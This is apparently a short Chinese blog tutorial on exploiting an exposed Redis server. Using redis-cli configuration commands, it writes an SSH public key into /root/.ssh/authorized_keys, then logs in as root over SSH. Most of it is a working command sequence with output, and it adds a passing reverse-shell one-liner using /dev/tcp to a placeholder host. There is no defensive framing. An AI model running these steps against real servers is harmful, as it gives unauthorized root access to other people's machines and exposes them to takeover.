- A+
1,利用redis漏洞,远程登录服务器
1.1 登录远程 redis 并写入ssh公钥
[root@test ~]# redis-cli -h 192.168.168.168 -p 6379 -a 123456
# 设置路径等配置(必须有写入权限)
192.168.168.168:6379> config set dir /root/.ssh
OK
(写密钥或者直接写反弹shell也可以 /bin/bash -i $/dev/tcp/ip/port 0>&1)
# 上传公钥的备份文件名字为authorized_keys
192.168.168.168:6379> config set dbfilename authorized_keys
OK
# 写入 ssh公钥
192.168.168.168:6379> set xxx "\n\n\ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC81NVpk8QyY1Roeo8lvHzjpPkvkWy4vYTzJi0msFaxvbpkQ0k2EvWDL8gxCPiu5/TzA47xTTKkk2H9Us0ciPnKRHliJMx7X0t4HaQj2LZ15t186O4JBaZhD4AEHkJDl9g1kR5XVtJmeQREv7GNCMFhFILyre1BWrrMrZbT4x1SMimOfbvhi2itSB9tReMQYkgpiQ0RnV1YDgk83/+Hr root@test\n\n\n"
OK
# 保存配置
192.168.168.168:6379> save
OK
# 退出
192.168.168.168:6379> exit
1.2 登录远程服务器
[root@test-docker ~]# ssh [email protected]
The authenticity of host '192.168.168.168 (192.168.168.168)' can't be established.
RSA key fingerprint is SHA256:qiBj+5ipRG6rcY6uAbbeIelJK/huZgWVb4BM855YTZs.
RSA key fingerprint is MD5:84:21:21:f8:7c:5d:71:00:9d:f9:cb:df:4e:63:fe:35.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.168.168' (RSA) to the list of known hosts.
Last login: Fri Dec 14 10:48:58 2018 from 61.50.114.230
1.3 查看公钥信息
[root@VM_0_11_centos ~]# more /root/.ssh/authorized_keys
REDIS0008 redis-ver4.0.10
redis-bits
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
